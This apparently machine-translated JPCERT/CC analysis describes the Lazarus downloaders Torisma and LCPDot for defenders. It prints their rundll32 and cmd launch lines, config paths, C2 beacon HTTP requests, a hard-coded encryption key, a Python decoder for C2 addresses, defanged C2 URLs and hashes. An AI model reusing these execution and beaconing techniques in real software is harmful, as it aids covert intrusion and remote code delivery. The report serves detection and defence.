lazarus group

Lazarus Malware Torisma and LCPDot

Overview of Torisma

Torisma is a downloader-type that downloads and executes modules from the outside. The malware has been found to spread using malicious Word documents . Torisma confirmed by JPCERT / CC is a DLL file and is executed as an argument of rundll32.exe. The following is an example of command arguments when Torisma is executed.

“C:\Windows\System32\rundll32.exe” C:\ProgramData\USOShared\usosqlite3.dat,sqlite3_create_functionex mssqlite3_server_management jp-JP

This behaves suspiciously by giving the Export function (sqlite3_create_functionex in this example) followed by the key to decode the internal data (mssqlite3_server_management) as an argument. The following describes the Torisma setting information, communication method, and modules to download.

Torisma setting information

Torisma reads information such as communication destinations from a file. The following is the save destination of the file in which the Torisma setting information is saved (note that some samples do not read the setting information file).

· % LOCALAPPDATA % .IdentityService \ AccountStore.bak

At the beginning of the setting information file, there is a 12-byte signature (0x98 0x11 0x1A 0x45 0x90 0x78 0xBA 0xF9 0x4E 0xD6 0x8F 0xEE), and only the files that match the values ​​are read as setting information when malware is executed. Figure 1 is an example of configuration information.

clip_image002[6]

Figure 1: Example of Torisma configuration information

The setting information includes information such as the communication destination (see Appendix A for details on the setting information).

Communication with Torisma’s server

The following is an example of the first HTTP POST request that Torisma makes.

POST /[PATH] HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

Connection: Keep-Alive

Content-Length: [Length]

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)

Host: [Server]

Cache-Control: no-cache

ACTION=VIEW&PAGE=[MAC Address]&CODE=[Number]&CACHE=[Base64 Data]REQUEST=[Number]

[Base64 data] includes the URL of the communication destination, MAC address, etc. (For details on the format of the data to be sent, see Appendix B). If the server responds to this HTTP POST request with the following response, Torisma will send the next request.

Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba}

The next HTTP POST request to send is:

POST /[PATH] HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

Connection: Keep-Alive

Content-Length: [Length]

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)

Host: [Server]

Cache-Control: no-cache

ACTION=PREVPAGE&CODE=C[Number]&RES=[Numer]

In response to this request, the server downloads an encrypted and Base64-encoded (“+” converted to space) module. Torisma uses an algorithm called VEST-32 for encryption . In all the samples confirmed by JPCERT / CC, “ff7172d9c888b7a88a7d77372112d772” was used for the encryption key (see Fig. 2). This encryption is also used to encrypt the communication destination information included in the setting information.

clip_image004[6]

Figure 2: Key used for Torisma’s VEST-32 encryption

Torisma module

Torisma can perform a variety of actions by downloading and running additional modules. The downloaded module is not in PE format, but executable code as shown in Figure 3.

clip_image006[6]

Figure 3: Code example for the Torisma module

JPCERT / CC confirms that multiple modules are used at the time of the attack. The following are the functions of the module we are checking.

· Sending information about infected hosts

· Execution of a specific file

Overview of LCPDot

Like Torisma, LCPDot is a downloader-type malware that downloads and executes modules from the outside. Some of the confirmed samples were obfuscated by VMProtect. The malware is believed to have been used to spread the infection inside the network after the Torisma infection. Specimens confirmed by JPCERT / CC behave suspiciously by giving the following options at runtime.

· -p: RC4 coded

· -s: Base64 encoded destination

The following is an example when executing with options specified.

“C:\Windows\System32\cmd.exe” /c C:\ProgramData\Adobe\Adobe.bin -p 0x53A4C60B

The following describes the LCPDot setting information and communication method.

Communication with LCPDot’s server

The following is an example of the first HTTP POST request that LCPDot sends.

POST /[URL] HTTP/1.1

Accept: text/html

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Cookie: SESSID=[Base64 data]

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: [Host]

Content-Length: [Size]

Connection: Keep-Alive

Cache-Control: no-cache

Cookie=Enable&CookieV=[Number]&Cookie_Time=64

[Base64 data] contains the encoded value of “[ID] -101010” ([ID] will be the same value for subsequent communications). If the server responds to this HTTP POST request with the following response, LCPDot will send the next request.

Success

LCPDot then sends the following HTTP GET request:

GET /[URL] HTTP/1.1

Accept: text/html

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Cookie: SESSID=[Base64 data]

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: [Host]

Content-Length: [Size]

Connection: Keep-Alive

Cache-Control: no-cache

[Base64 data] contains the encoded value of “[ID] -101011”. In response, the RC4 encrypted module will be downloaded. For the encryption key, the value specified in the sample or run-time option -p is converted to the SHA1 hash value.
Since the module was not available this time, the function of the module is unknown, but we have confirmed that there is a function to disguise the transmitted data as a GIF image and send it in the communication after executing the module (Fig. 4). ..

clip_image008[6]

Figure 4: Code to disguise LCPDot transmission data as a GIF image

LCPDot setting information

LCPDot holds the communication destination information in the sample (it may be specified by the option -s at runtime). The communication destination information is XOR + Base64 encoded. The following is an example of a Python script that decodes the encoded destination.

decoed_base64_data = base64.b64decode(encode_data)

for i in decoed_base64_data:

print chr(((ord(i) ^ 0x25) – 0x7a))

LCPDot saves the configuration data including this communication destination to a file. We have confirmed that there are multiple patterns in the file path of the file to be saved. The following is an example of a file path.

· %TEMP%\..\Thumbnails.db

· %TEMP%\..\ntuser.log1

The data in the configuration file is RC4 encrypted, and the encryption key is the value specified in the sample or at runtime option -p converted to a SHA1 hash value. Figure 5 is an example of the decrypted configuration data.

clip_image010[6]

Figure 5: Example of decrypted configuration data

IOCs

https[:]//www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php
https[:]//www.fabianiarte.com/newsletter/arte/view.asp
https[:]//www.scimpex.com/admin/assets/backup/requisition/requisition.php
https[:]//akramportal.org/public/voice/voice.php
https[:]//inovecommerce.com.br/public/pdf/view.php
https[:]//www.index-consulting.jp[:]443/eng/news/index.php
http[:]//kenpa.org/yokohama/main.php
https[:]//vega.mh-tec.jp[:]443/.well-known/index.php
http[:]//www.hirokawaunso.co.jp/wordpress/wp-includes/ID3/module.audio.mp4.php
https[:]//ja-fc.or.jp/shop/shopping.php
https[:]//www.leemble.com/5mai-lyon/public/webconf.php
https[:]//www.tronslog.com/public/appstore.php
https[:]//mail.clicktocareers.com/dev_clicktocareers/public/mailview.php

Tourism
9ae9ed06a69baa24e3a539d9ce32c437a6bdc136ce4367b1cb603e728f4279d5
f77a9875dbf1a1807082117d69bdbdd14eaa112996962f613de4204db34faba7
7762ba7ae989d47446da21cd04fd6fb92484dd07d078c7385ded459dedc726f9
ff654c462598a38bf7eac32adaba1d98a9334ba1
681de106d387c41913863547c70ee66a1e9fbdc6
bab2c77c9e3eea39e2e8b0f4ff3b3d6490690eb8
634529cef6a2fdd6c5efeb658f43eb94
9a00ebe67d833edb70ed6dd0f4652592
004c8a97c2606c838764a629b13e4fb7

LCPDot
0c69fd9be0cc9fadacff2c0bacf59dab6d935b02b5b8d2c9cb049e9545bb55ce
a9334efa9f40a36e7dde7ef1fe3018b2410cd9de80d98cf4e3bb5dd7c78f7fde
ba57f8fcb28b7d1085e2e5e24bf2a463f0fa4bbbeb3f634e5a122d0b8dbb53cc
a9b253479a1723875711ea68059d890154119459
1d261bae90a95c20caf7a12e9b404dd39009267a
5f8d04df7a7c63b4bee2ba5f6ac3fa833c7f1872
b8df94ce84201b17684e0d368ed38024
81ca4bd42b01fe43cefd7fc38083bc6b
8ee9956a0631c641470a94fdc7b44430